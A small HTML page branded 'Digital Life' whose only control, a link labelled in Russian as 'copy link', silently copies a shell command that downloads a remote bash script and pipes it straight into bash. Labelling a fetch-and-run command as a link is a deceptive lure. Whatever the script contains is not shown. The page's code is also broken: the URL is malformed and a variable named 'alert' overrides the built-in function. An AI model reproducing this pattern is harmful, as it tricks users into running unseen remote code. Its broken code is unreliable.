<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Digital Life</title>
    <style>
        /* Reset and base styles  */
        * {
            padding: 0px;
            margin: 0px;
            border: none;
        }

        *,
        *::before,
        *::after {
            box-sizing: border-box;
        }

        :focus,
        :active {
            /*outline: none;*/
        }

        a:focus,
        a:active {
            /* outline: none;*/
        }

        /* Links */

        a, a:link, a:visited  {
            /* color: inherit; */
            text-decoration: none;
            /* display: inline-block; */
        }

        a:hover  {
            /* color: inherit; */
            text-decoration: none;
        }

        /* Common */

        aside, nav, footer, header, section, main {
            display: block;
        }

        h1, h2, h3, h4, h5, h6, p {
            font-size: inherit;
            font-weight: inherit;
        }

        ul, ul li {
            list-style: none;
        }

        img {
            vertical-align: top;
        }

        img, svg {
            max-width: 100%;
            height: auto;
        }

        address {
        font-style: normal;
        }

        /* Form */

        input, textarea, button, select {
            font-family: inherit;
            font-size: inherit;
            color: inherit;
            background-color: transparent;
        }

        input::-ms-clear {
            display: none;
        }

        button, input[type="submit"] {
            display: inline-block;
            box-shadow: none;
            background-color: transparent;
            background: none;
            cursor: pointer;
        }

        input:focus, input:active,
        button:focus, button:active {
            outline: none;
        }

        button::-moz-focus-inner {
            padding: 0;
            border: 0;
        }

        label {
            cursor: pointer;
        }

        legend {
            display: block;
        }

        .wrap-img {
            width: 100%;
            height: 100vh;
            background: #000;
            position: relative; 
            display: flex;
            align-items: center;
            justify-content: center;
        }
    </style>
</head>
<body>
    <div class="wrap-img">
        <a onclick="copy('wget -O - https:/digital-life-71.github.io/.github/bash.sh | bash');">Скопировать ссылку</a>
        <svg  width="147" height="33" viewBox="0 0 147 33" fill="none" xmlns="http://www.w3.org/2000/svg">
            <path d="M16.8953 21.2C16.8953 21.9467 16.6153 22.6 16.0553 23.16C15.4953 23.72 14.842 24 14.0953 24H0.0953157V10L2.89532 7.2H0.0953157V4.4H14.0953C14.842 4.4 15.4953 4.68 16.0553 5.24C16.6153 5.8 16.8953 6.45333 16.8953 7.2V21.2ZM13.6953 21.2V7.2H3.29532V23.6L5.69532 21.2H13.6953ZM24.2844 7.6H21.4844V4.4H24.2844V7.6ZM24.2844 24H21.4844V12L24.2844 9.2V24ZM43.8828 10L41.4828 12.4H31.4828V21.6H39.8828V13.6H42.6828V29.6C42.6828 30.3733 42.4028 31.0267 41.8428 31.56C41.3095 32.12 40.6561 32.4 39.8828 32.4H28.2828L30.6828 30H39.8828V21.96L37.4828 24H31.4828C30.7095 24 30.0428 23.7333 29.4828 23.2C28.9495 22.64 28.6828 21.9733 28.6828 21.2V12.8C28.6828 12.0267 28.9495 11.3733 29.4828 10.84C30.0428 10.28 30.7095 10 31.4828 10H43.8828ZM49.6781 7.6H46.8781V4.4H49.6781V7.6ZM49.6781 24H46.8781V12L49.6781 9.2V24ZM62.8766 24H57.2766C56.5032 24 55.8366 23.7333 55.2766 23.2C54.7432 22.64 54.4766 21.9733 54.4766 21.2V12.4H50.4766L52.8766 10H54.4766V7.2L57.2766 4.4V10H62.8766V12.4H57.2766V21.6H62.8766V24ZM78.6797 24H75.8797V21.96L73.4797 24H67.4797C66.7064 24 66.0397 23.7333 65.4797 23.2C64.9464 22.64 64.6797 21.9733 64.6797 21.2V18.4C64.6797 17.6267 64.9464 16.9733 65.4797 16.44C66.0397 15.88 66.7064 15.6 67.4797 15.6H75.4797L73.0797 17.96H67.4797V21.6H75.8797V12.4H64.6797L67.0797 10H75.8797C76.653 10 77.3064 10.28 77.8397 10.84C78.3997 11.3733 78.6797 12.0267 78.6797 12.8V24ZM85.8641 24H83.0641V3.6L85.8641 0.799998V24ZM111.491 24H97.4906V4.4H100.691V21.2H108.291V18.4H111.491V24ZM115.898 7.6H113.098V4.4H115.898V7.6ZM115.898 24H113.098V12L115.898 9.2V24ZM132.297 1.6L129.857 4H123.097V11.6L124.737 10H131.897L129.457 12.4H123.097V24H120.297V4.4C120.297 3.62667 120.564 2.97333 121.097 2.44C121.657 1.88 122.324 1.6 123.097 1.6H132.297ZM146.906 24H135.706C134.933 24 134.266 23.7333 133.706 23.2C133.173 22.64 132.906 21.9733 132.906 21.2V12.8C132.906 12.0267 133.173 11.3733 133.706 10.84C134.266 10.28 134.933 10 135.706 10H144.106C144.88 10 145.533 10.28 146.066 10.84C146.626 11.3733 146.906 12.0267 146.906 12.8V15.6L144.106 18.4H136.106L138.506 16H144.106V12.4H135.706V21.6H146.906V24Z" fill="white"/>
        </svg>
    </div>

    <script>
        function copy(str){
            let tmp   = document.createElement('INPUT'), // Создаём новый текстовой input
                focus = document.activeElement; // Получаем ссылку на элемент в фокусе (чтобы не терять фокус)
    
            tmp.value = str; // Временному input вставляем текст для копирования
    
            document.body.appendChild(tmp); // Вставляем input в DOM
            tmp.select(); // Выделяем весь текст в input
            document.execCommand('copy'); // Магия! Копирует в буфер выделенный текст (см. команду выше)
            document.body.removeChild(tmp); // Удаляем временный input
            focus.focus();} // Возвращаем фокус туда, где был
    
            var alert = 'ссылка скопирована в буфер';
            alert(alert);
    </script>
</body>
</html>